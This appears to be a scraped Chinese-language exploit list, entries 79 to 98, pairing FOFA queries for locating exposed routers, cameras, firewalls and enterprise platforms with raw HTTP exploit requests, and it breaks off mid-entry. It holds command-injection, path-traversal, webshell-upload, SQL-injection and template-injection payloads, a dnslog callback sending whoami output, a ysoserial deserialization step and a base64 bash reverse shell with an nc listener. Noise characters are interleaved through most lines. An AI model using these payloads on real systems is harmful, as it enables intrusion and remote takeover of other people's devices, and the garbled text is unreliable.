- i0 k1 ] j [5 O/ r% K6 J2 _8 o/Applications/SkillDevelopAndEHS/
. w7 i& z& ^4 e# J" ?------YsOxWxSvj1KyZow1PTsh98fdu6l--
* e+ g: X) y" i9 L, O: }- b
) V3 x( ~# I# I/ w8 _8 [/ I2 N% [* ~! Q" p: z, Q9 |
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1& d; k0 F) q" v7 u) h9 J
Host: x.x.x.x1 V- @" d, ~/ f7 N: u6 b
2 F8 X- R% n/ k+ c' Y( `* j! [) N0 b2 L% z2 ~! v j; ]
79. BYTEVALUE 百为流控路由器远程命令执行; A4 s" u" u7 o% U' R! }
FOFA:BYTEVALUE 智能流控路由器
5 q: k1 J7 R- w& l% i8 [GET /goform/webRead/open/?path=|id HTTP/1.1
x) X$ K4 e) u- IHost:IP# t' v ~* O( j2 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0! L5 v3 ]! r1 m* y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 j9 G4 ]8 b) A$ m9 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 a8 U# _: c9 N8 C+ wAccept-Encoding: gzip, deflate
, ]- r, H) R3 X; MConnection: close
6 Z# G# B4 k7 \Upgrade-Insecure-Requests: 1
3 T5 L7 C/ r4 S2 B
) Y( Q: e( @4 y9 y7 @/ C ^; y. k6 T; s' @; r4 D8 }
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传$ M5 w S) E1 S, D$ d
FOFA:app="速达软件-公司产品"
/ p6 ?8 Q! i/ O! nPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
' k. S8 P" j, F! v1 i1 cHost: x.x.x.x
6 J+ {$ X: O: q9 D. f5 U. VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! A/ v9 z6 g& e' b+ d, C. P3 ?: `6 F5 DContent-Length: 27/ d8 T9 @' R r! Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
V! k$ N% X3 Z4 U! l$ b. p+ W' |Accept-Encoding: gzip, deflate# }$ |& } Y% ^2 W9 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 K/ A+ G) `8 O, s. h% U# d# f
Connection: close
; q7 C7 X. [: a2 Z0 @Content-Type: application/octet-stream
( Z, l1 X! S9 X" D4 i4 s. f; EUpgrade-Insecure-Requests: 13 Q1 e3 _# ? Z% n g2 k
/ V7 E( {' L O; U, F& M
<% out.print("oessqeonylzaf");%>
$ D$ V+ L5 {- q) O1 K6 X+ w* U" T5 o! t |
# U% \& s2 ]9 I4 q% L" v: OGET /xykqmfxpoas.jsp HTTP/1.11 G7 p/ ~; z" r* ?& X) N7 Q
Host: x.x.x.x/ c/ L; y1 z3 F* v! u2 D1 P& {- `6 J6 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 f, z. _0 E5 d7 q' i3 v- p
Connection: close
) M6 Z3 C5 j. P4 v6 w, DAccept-Encoding: gzip6 S- `$ Z ~4 c9 h) \# D
. w. x6 z Q' N( ^, S) y0 y$ Y; W4 O `8 p8 g! ?9 b
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
: `/ N6 L* h# H7 Q$ s1 a S4 QFOFA:app="uniview-视频监控") @+ l7 x: ?9 m h9 `/ g* L t9 b! j
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1. q( j8 P( o+ b- Q
Host: x.x.x.x
s( X% o- z6 n# r2 l3 m0 f, W( j$ HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. z' N. r a- N2 P* q" S9 ~Connection: close/ A8 _7 l: o' y M: b
Accept-Encoding: gzip
! F" x& y' v$ B$ G% \4 j
3 g/ _( [* v3 c" O
2 A X: `- Z W+ D, e82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
9 }$ q: s r, \, K% YFOFA:app="思福迪-LOGBASE": H1 w; B- B: I$ o
POST /bhost/test_qrcode_b HTTP/1.1( ?0 \+ _- @# X/ }) F# k0 ~
Host: BaseURL
, P8 f+ r$ ^% A7 C* k3 B* p0 q( SUser-Agent: Go-http-client/1.1
2 @' J$ `% P1 mContent-Length: 238 k" e0 J1 V( T. y' |
Accept-Encoding: gzip! K$ r# G$ o A' w1 y( z, ~- M
Connection: close
' ]0 [0 F( Y. W% H* sContent-Type: application/x-www-form-urlencoded
$ Y" p- o) X) DReferer: BaseURL$ ~8 y5 S) p! I
0 _7 M# @8 X( a; X- i: P
z1=1&z2="|id;"&z3=bhost3 d& c% I& Q7 L
! M& [ e* M9 k" O" n7 {7 o6 V; N( B0 c t" `- i7 I; p' W* R
83. JeecgBoot testConnection 远程命令执行
: _3 I/ S% D8 g7 G( wFOFA:title=="JeecgBoot 企业级低代码平台"/ ]2 Q& H R9 T: f, n3 ?2 U9 n: Z
Q, z4 o2 ] m, W+ e4 w7 v( w# {
T9 d1 N9 y+ |8 k: y/ ?2 I
POST /jmreport/testConnection HTTP/1.10 B7 O: ^8 ^2 Y8 n
Host: x.x.x.x
: c6 G6 q/ }4 m3 c# d5 w; BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' P" D0 v3 n) @+ \. K) |2 U2 ^6 @Connection: close
; I4 x1 V* E1 P' W `3 tContent-Length: 8881
4 `- _; e4 j* B+ eAccept-Encoding: gzip
! Y! f/ k" j+ ^% v" O" w1 hCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"# `3 T8 ~ T7 B8 K# @! Y
Content-Type: application/json
" R, j: f6 E5 W
1 Q+ V* `/ O* K4 m7 r K; xPAYLOAD
2 p: n j: i& |+ ~2 i& F6 b4 {
4 n5 k: d/ j1 w. h) \; t84. Jeecg-Boot JimuReport queryFieldBySql 模板注入7 @' ~4 r' z+ W+ J4 S# P
FOFA:title=="JeecgBoot 企业级低代码平台"2 f. |1 E. O8 N7 y3 `+ n- A5 U
7 ]/ Y) I' E- i. b3 O8 X7 q/ u) O
) S; q9 X2 e. E' A
7 T! o: L" V/ wPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1+ G* M+ w) A4 a$ U4 c
Host: 192.168.40.130:8080& [8 v9 q3 A t
User-Agent: curl/7.88.1
9 L4 q8 l$ q5 H$ X+ xContent-Length: 156! J3 G) s3 f0 a; v& |" I, s" N
Accept: */*' [7 y. x' F! A4 j
Connection: close
* _; o. H+ v s1 f3 D1 l- FContent-Type: application/json; W( J: N2 S4 B5 C$ H& ~
Accept-Encoding: gzip1 T4 O. ]* \, x
7 t! T- J l- D& p, v6 F4 D) P{& r3 _9 s8 G: P. l; L4 J( c: }
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
) j; S5 ]/ K* l' B: @/ _/ Y "type": "0"2 x6 T9 o6 H" G" W3 R' s2 Q
}
$ n1 h' D4 w& z! b1 @3 }3 E% t/ D
- O9 O- C7 Z' S. Y
% D4 F; G9 X9 M+ ]1 p1 E% h85. SysAid On-premise< 23.3.36远程代码执行3 d) V" r" S @
CVE-2023-47246, s7 R4 x- ], E7 T& w
FOFA:body="sysaid-logo-dark-green.png"
( _; A" H, ^2 N6 \EXP数据包如下,注入哥斯拉马
) E8 x+ ^' l/ p6 F9 rPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.16 X6 k# N& Z6 G: S! H' H
Host: x.x.x.x
# |) p! K5 k, ]' {; O# IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# Q( i: |& z$ ~% L/ T, N
Content-Type: application/octet-stream8 m* E. R4 d0 J7 S; t0 ]
Accept-Encoding: gzip0 @# M( }) j) `- a( x4 p) @2 B5 t) I
& }7 C2 W) k- W* z
PAYLOAD$ v" G1 F. l& W- B& S
3 ~4 N6 V- ^, q# X回显URL:http://x.x.x.x/userfiles/index.jsp
1 m C+ Q0 c- q5 h. V( x1 ]
4 r) p v- o$ k86. 日本tosei自助洗衣机RCE& a; L: s. q" U- ]. ?
FOFA:body="tosei_login_check.php"
: P( l" |; G7 ~- q- ^- b0 WPOST /cgi-bin/network_test.php HTTP/1.1! u7 k2 O ~/ z! J4 R
Host: x.x.x.x; t& I2 f7 V7 Z& w& L) e6 ^; r* b
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36' B6 x% K D1 ~# r
Connection: close' K2 y0 B1 d6 I
Content-Length: 449 S- \5 A" g; c6 _( V
Accept: */*4 d9 d" C' _, a/ `2 f
Accept-Encoding: gzip
5 g+ {0 U/ ^/ PAccept-Language: en* M- s, N* s* U7 b
Content-Type: application/x-www-form-urlencoded+ d9 T- V8 M/ ^# K$ p
6 I. m" @* ]. r" ^6 k
host=%0acat${IFS}/etc/passwd%0a&command=ping4 I+ m# q# t3 h
( D7 u+ R4 R3 C" ]& j0 M, J
- o: |$ A( e0 ~1 A! b! U87. 安恒明御安全网关aaa_local_web_preview文件上传
4 ^; u: k" \9 l3 b3 G. SFOFA:title="明御安全网关"
7 Z) Z9 V# S/ O: ~1 _6 U+ ?/ S6 }8 W5 CPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
2 \; r$ \/ p- d3 VHost: X.X.X.X
9 J- r! @! G; \$ C" EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
T0 x! h5 ~' y9 `Connection: close0 N; A, J$ \5 r4 E3 ~" ~& X
Content-Length: 198- v9 o/ y8 a/ W, o1 B+ c& l5 e
Accept-Encoding: gzip
2 g- V0 ]& w3 IContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd2 U% `5 P/ `) i* Q
% f7 I# E! \' x7 l# L
--qqobiandqgawlxodfiisporjwravxtvd9 x: i; m6 n, d, D
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"& }; b. N9 T. [$ k: n
Content-Type: text/plain# i& H, M2 d/ l5 q( n1 H9 A4 r
' w7 e+ f$ E. ~# s2ZqGNnsjzzU2GBBPyd8AIA7QlDq- U$ _ ~1 ]- R; |# w1 P
--qqobiandqgawlxodfiisporjwravxtvd--/ G7 {& |1 h# F0 f3 v- H
: N4 `% h4 x" P+ L, X
) u$ N0 I" b1 F% [. w/jfhatuwe.php8 G0 Y* m- R2 G& ]# S% W: n
/ C) @4 \5 D+ R5 g88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行 G! @! v( I# G
FOFA:title="明御安全网关"
% w8 q' K0 m+ A: b! ~GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1% V4 g: c0 U: x; k
Host: x.x.x.xx.x.x.x
/ k j. }" e5 k7 }$ K( ?/ ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 K' o! {- @" g4 v& ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& o+ |- @ V" e3 e& gAccept-Encoding: gzip, deflate* f- `! n) j6 y& I4 t$ L% B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 w _# n r) I
Connection: close" K( f L! s! V" h# G: f3 C0 d' f
. ^) } q! j+ w% H* g4 A
/ M* ]+ G! ]- N+ ]7 T6 P# x2 j1 n
/astdfkhl.php3 _! f/ S- O/ J" I! u, d7 x0 B, I
$ W8 X. U( s0 h5 s" J6 U
89. 致远互联FE协作办公平台editflow_manager存在sql注入1 K( t- _) j1 B2 i/ Z) L6 o( s2 r
FOFA:title="FE协作办公平台" || body="li_plugins_download"
6 e8 X0 x& p9 l: G$ l# i* H1 fPOST /sysform/003/editflow_manager.js%70 HTTP/1.1: U( C9 B* ]9 z* @8 r$ Z/ T( b
Host: x.x.x.x: w8 x) ~4 {6 |0 z7 U7 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 W9 i! U) D' h# TConnection: close/ o8 C$ Z3 n5 f7 E
Content-Length: 412 o+ J0 N D3 w4 f$ o
Content-Type: application/x-www-form-urlencoded
% M2 e' K+ ]- I3 U! z% p PAccept-Encoding: gzip
/ X) ~- F* m0 p: I, D6 l3 |- ]& `* i: m$ @8 e7 w
option=2&GUID=-1'+union+select+111*222--+4 E; y/ F" T- R* b- b
# ~; {3 b- p7 R* [9 O, r' \: e5 ?
* Y! l6 L5 \9 Y. {5 N @8 p& f90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行5 [6 x7 c. {8 x: }* R5 Q
FOFA:icon_hash="-1830859634"
: } \% D* m, W, ZPOST /php/ping.php HTTP/1.1
$ D9 R$ Q/ a0 U( I- AHost: x.x.x.x
?3 ]1 ^* T6 `& [' PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.03 U: R, C1 [$ a( I4 g2 ]* `
Content-Length: 51
: z: D8 }( K6 c( ^3 g7 dAccept: application/json, text/javascript, */*; q=0.01
' r" J1 M# A5 q! K. ?- gAccept-Encoding: gzip, deflate& U n- e( e4 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. M# L8 F3 x2 f# T2 i
Connection: close
, K( [' m' b$ I8 ]* \- Z# nContent-Type: application/x-www-form-urlencoded: _1 k* ?0 [3 t5 N. A, P+ x
X-Requested-With: XMLHttpRequest
( x' A9 U2 |& Y3 |+ c4 s
- j$ `5 l8 D# s6 \" ajsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig. t2 ]# h6 A {. q( }
2 u% J4 j8 }/ E! w
4 P& r0 ]0 D. x$ |$ L6 a
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取0 r5 w2 t: J6 |8 r( y3 J
FOFA:title="综合安防管理平台"
# y. y2 j' M# v2 _! TGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
; [( g! X0 l" h' NHost: your-ip& U$ ?* g: c; t* C) m8 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.365 |2 b* A2 a7 o" k+ J1 \
Accept-Encoding: gzip, deflate- v3 ?* Z# {6 R. l* T+ l
Accept: */*( K* F: L) r( a5 H/ N# R; }
Connection: keep-alive
1 C0 ]9 |+ Z3 r4 V5 Z
; Y4 @) M* V; K
1 T. M# |, o2 [ n% V! Q7 P
$ C! D |9 E" @; O [1 ?92. 海康威视运行管理中心session命令执行% |) P( J6 ~% i$ `1 @3 Z! @* a
Fastjson命令执行$ }% S9 d- t6 z: u
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
7 Y/ A4 Q# q( `4 L p1 cPOST /center/api/session HTTP/1.1
8 O' L+ [* o- iHost:, {: |3 |7 X- S9 {7 p+ f; H
Accept: application/json, text/plain, */*
( h* t/ F$ H( d8 yAccept-Encoding: gzip, deflate2 i; {# F: m. W f
X-Requested-With: XMLHttpRequest
R E& _% w& u( k; t- d: n1 jContent-Type: application/json;charset=UTF-8
: x" _- I) ^3 O# I* q0 p4 PX-Language-Type: zh_CN
4 }% q0 b K5 L8 I" I. n$ nTestcmd: echo test
; J+ A- m2 S9 b0 b6 ]7 _$ s& c8 {. e5 [5 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.369 L# R4 m) ~6 h3 a' r' |5 ~1 ~
Accept-Language: zh-CN,zh;q=0.9
/ O! `5 L, y+ ]$ q$ y1 F/ xContent-Length: 57783 R! S% m3 z) P) W3 ^
$ ~ {7 @' z9 C7 e8 p' A
PAYLOAD
/ w8 h, w2 s/ c: X2 I j# a, ]2 h3 I9 b9 M
7 `* Q& M- p f6 L! h
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传6 P3 n. H6 I8 F+ N" }( I( O
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
* z$ Y3 S# m! `) Z; aPOST /?g=app_av_import_save HTTP/1.1. Y( l o1 k5 r* W1 q" r. r* A
Host: x.x.x.x
' g5 \, R! [0 o; n gContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
+ s- J U X3 J$ h" @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 H* A/ l" E1 U4 X* i/ D2 A6 A) Z
/ U! D+ O9 z$ V8 A7 @) [------WebKitFormBoundarykcbkgdfx5 H' E0 b9 _& i- L
Content-Disposition: form-data; name="MAX_FILE_SIZE"
/ {6 F1 ?- p5 u
5 O1 {: w7 ]3 Z/ u7 ]100000002 `' {7 @( q, B1 Q1 r3 M
------WebKitFormBoundarykcbkgdfx! S+ k% Z" o1 o9 u9 b% H3 e5 ?0 e
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
5 q% y% P7 [8 I' y) }$ g) s8 f- VContent-Type: text/plain
" d5 R: a$ z/ I7 ~* @6 b0 K
8 S: X2 X: \7 s8 Nwagletqrkwrddkthtulxsqrphulnknxa9 z3 H. t' W! b u/ Z6 H& S! @
------WebKitFormBoundarykcbkgdfx* o2 B6 a! r. p3 B9 ^
Content-Disposition: form-data; name="submit_post"
) D, f+ ], r% ?6 l/ u
" Z$ g/ l' G+ Y: `obj_app_upfile
; E2 @* _ i. o7 m$ n+ n. ?9 ?0 M2 Y------WebKitFormBoundarykcbkgdfx
. V! k7 ?3 ~2 I0 v7 F+ ]' ?% eContent-Disposition: form-data; name="__hash__"3 t5 L5 p% V) Q( [* f. |
+ D, h3 c+ B3 A& W& _0b9d6b1ab7479ab69d9f71b05e0e9445( @! Z: R7 a+ J, N2 C% h
------WebKitFormBoundarykcbkgdfx--
: ]; K+ V% m9 a) X: |/ K, z
/ F t! d9 \1 u: n, g8 P; \, _0 F2 \+ \+ X3 t6 @0 L h' U
GET /attachements/xlskxknxa.txt HTTP/1.1
- P3 Q. o( r" RHost: xx.xx.xx.xx
$ G, I8 n% V2 H8 u% G) LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( l2 z5 s$ p. \* Q( F- L; Z8 t* ?
2 F6 d2 l; U1 I. c j6 D `8 K
6 M* p) L0 V3 Q) L( [8 f7 a
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
# x, m% Q& K, R) e. K( x" YFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& T, P& {( P) C; j
POST /?g=obj_area_import_save HTTP/1.1
2 r& x- f. S" Q7 GHost: x.x.x.x0 g+ B$ E/ C/ A- O- W) y) P: g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
7 z5 H+ `3 x$ r5 C5 o+ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
5 w. h& R; e) O& ~1 o! E5 r5 A/ h) ?3 n8 X1 v ~4 T* y) o
------WebKitFormBoundarybqvzqvmt8 k( x; ]" u6 O7 Y
Content-Disposition: form-data; name="MAX_FILE_SIZE"
( J0 J4 p' K4 s6 H7 k N- r0 C; R4 M' W) j' J& E: o
10000000
3 ?! k: B1 O. C' V, Y! [7 S+ x, o5 @- Y------WebKitFormBoundarybqvzqvmt! o- V1 ~" @4 y& j
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
. [ f: x6 z; z9 u8 L3 \9 ZContent-Type: text/plain
/ v3 D! R& i' g" `9 V. U: V+ C+ M! o f0 b# w4 \# \
pxplitttsrjnyoafavcajwkvhxindhmu
+ P! w2 Z+ |& V8 P4 [3 ?& e------WebKitFormBoundarybqvzqvmt8 m/ N6 w2 D( e; T
Content-Disposition: form-data; name="submit_post") I6 p- j% v! [5 o: c
2 H7 G, E& _3 h, q4 ]; e& kobj_app_upfile8 K' j# j. i* m7 b7 p
------WebKitFormBoundarybqvzqvmt: m$ c+ Z C* W7 X9 E5 [9 q
Content-Disposition: form-data; name="__hash__"
* _) U# K; H0 I# U+ _) Y0 U5 Q2 V$ r; A& ?- O
0b9d6b1ab7479ab69d9f71b05e0e94450 C% X! m s' n" M& q% H
------WebKitFormBoundarybqvzqvmt--
# _$ p% I1 F0 {. p" R6 P) [) T
6 \2 j2 _: U* l+ s- o' H. k+ r+ H* p$ v' T
( A: \4 O- C! w9 R: S2 A4 A" G6 U) nGET /attachements/xlskxknxa.txt HTTP/1.1" c8 Z& L4 T6 m0 f5 c) V) d
Host: xx.xx.xx.xx
/ g7 g: P3 Y1 _1 z7 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) J9 E8 D1 o( `, o c
2 Y' T6 s/ B1 d# E; \; ]+ o- i: C
$ q5 O5 w* g/ U/ w% V v
. l2 N# L/ a( H95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ W# N0 \9 Q9 b) `
CVE-2023-49070! T9 g2 F# `% J
FOFA:app="Apache_OFBiz"
`2 ]" ?% @6 y7 w7 @% O# APOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
2 p1 F2 N7 ^8 }8 E% | RHost: x.x.x.x, _! Z' @' `3 N/ c/ }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 @& B) D; T8 q# d( ` QConnection: close9 b" ^9 [+ t% O% e
Content-Length: 8895 v& l0 B- Z& M: m# V; f, X
Content-Type: application/xml# S1 j2 y0 H3 V& `) }6 ]! j3 i
Accept-Encoding: gzip
: E/ K* ?8 r. t K, G) D5 k( [3 X) G, T0 m% @5 P0 q% a0 m
<?xml version="1.0"?>* R0 M l: z- T: }8 G3 K9 @
<methodCall>
4 s& ]2 }6 u+ s8 W7 V3 v" ]# q3 C <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
/ s, R1 ^$ _, A9 ~ <params>4 Y- Q& c+ D7 w5 z. n4 S {" @1 |6 x
<param>
2 W2 @7 r; J1 |& k <value>+ `: m; T, n: g5 ?/ r
<struct>* I6 _5 [ Q @5 I9 c
<member>
4 U! R" b: Y1 T9 s- s) o _* C; M4 b <name>test</name>5 w$ G- Z1 I- v, W3 K, r( ?
<value>
& w0 v+ Q! y* S1 z; P- g <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
. D2 U. ?. Q: ?5 }) s </value>
4 b" M8 ^. [5 e+ f$ U! T( N </member>
4 T! X% ~ Q% Q% |; {7 B: I/ g8 P9 {6 s </struct>" e5 a6 E4 A. ^0 r
</value>
1 ^, b T6 X$ w5 X </param>
6 ^9 l+ O$ V0 P# _0 f </params>+ Y/ l# R: \' d: k) C1 k
</methodCall>
9 J' z9 Y( U: x7 o/ B% A2 E4 k$ M; Y1 {! W5 P' z1 s9 P; \
5 O: ]2 x2 u8 ^$ k2 l# D: {
用ysoserial生成payload* v2 V4 d* S/ r. e& i
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
6 h2 U" G) q$ r! Q& U( j4 K7 K8 n; X2 h8 w9 r
7 H( [( E' x8 V
将生成的payload替换到上面的POC
! i& R* O$ s, p/ `) `POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" |5 X0 J3 H: v$ X+ R3 S% J0 O
Host: 192.168.40.130:84438 N, H1 p6 `5 v- F- D8 O/ X. k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' [5 R S$ C" o% B3 B5 z7 O
Connection: close5 `3 a# o( x5 W1 y: @% G4 f! T
Content-Length: 889
/ S0 H! ^/ T; B2 i% z, ZContent-Type: application/xml6 ~+ R' f, o6 [2 t# j2 }6 o
Accept-Encoding: gzip
% U. q$ {( O) a# ~6 a$ \
, Q% M! I4 n$ i1 R" Y6 c% y" TPAYLOAD
8 `# V" }3 R0 \4 ` J) j& m6 h8 H3 |2 G8 X2 b7 N0 e
96. Apache OFBiz 18.12.11 groovy 远程代码执行
O' h0 q/ ^, [0 L2 BFOFA:app="Apache_OFBiz"
- p! P8 { r! T& MPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, S/ ]& n1 `" P; aHost: localhost:8443
8 [0 h7 ~: j MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. R; ^3 N# N2 m
Accept: */*
( Y6 j1 w# t& h9 \2 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 H+ o& C# D8 C
Content-Type: application/x-www-form-urlencoded
6 x5 Y/ Z: T0 ?# R; |Content-Length: 55
( n3 \+ p* m! m J1 @% L1 T6 G, V% u1 D; ] k* _, H" B' R! w
groovyProgram=throw+new+Exception('id'.execute().text);
8 v$ H/ L: F0 g: Z s, l
9 e7 p+ k6 D2 t( W( g. H) ~# {. i* D" s R' z# T8 `" c- F$ G
反弹shell
0 Z. ]" M) J7 K3 W: w5 B在kali上启动一个监听
0 z' q4 ~* r+ G) a6 Q1 ?nc -lvp 77778 J. m, }3 }. Z2 D: p
# [7 \ W4 l; ?) W9 y4 z
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.18 J2 _. v2 Q- A4 @4 L
Host: 192.168.40.130:8443
& y# p7 i% c |& q8 e0 O0 y# v% i0 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* L/ Q* Z, N$ f$ GAccept: */*/ C- S$ H) U5 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ T2 j; h1 P6 r4 I7 p+ h5 t5 O$ sContent-Type: application/x-www-form-urlencoded
2 f/ Q* a+ k, P3 P( B* r% g2 MContent-Length: 71$ [& g8 J7 n, c' `" W
* `& L! [, V7 z7 G
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
* N4 C) }% e/ C; H- e% K
+ e- X2 }. [; E7 B- ~9 A. m! |97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% W9 s6 ~+ T$ J$ qFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"- Y5 K8 k! m: S5 f' y! v2 P6 ]8 L: n
GET /passport/login/ HTTP/1.14 U9 j% d l2 p$ S E5 ^
Host: 192.168.40.130:8085
% X. T1 H8 T+ g& o+ K6 {2 y9 y. BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 n; A( u p# U: ~, h* D4 [Accept-Encoding: gzip
$ `5 D2 T5 P& lConnection: close9 _& \) ]2 x, [9 k
Cookie: rememberMe=PAYLOAD; `2 O6 o9 n$ |" B0 N
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"; p4 G# i) ~: U0 {- o# `# r# M. h& F
7 J5 I; z; s* f: n' z8 c- m* G+ r8 x6 H3 N
98. SpiderFlow爬虫平台远程命令执行
) U+ B) R9 k: B" RCVE-2024-0195' L/ n6 L2 ]: R- {
FOFA:app="SpiderFlow"% n9 L' k) H) ?" a
POST /function/save HTTP/1.1
$ V) `3 @0 Q" u' h' }' x+ W/ UHost: 192.168.40.130:80887 ^) m! T2 f" J% O* e+ r _: _) p
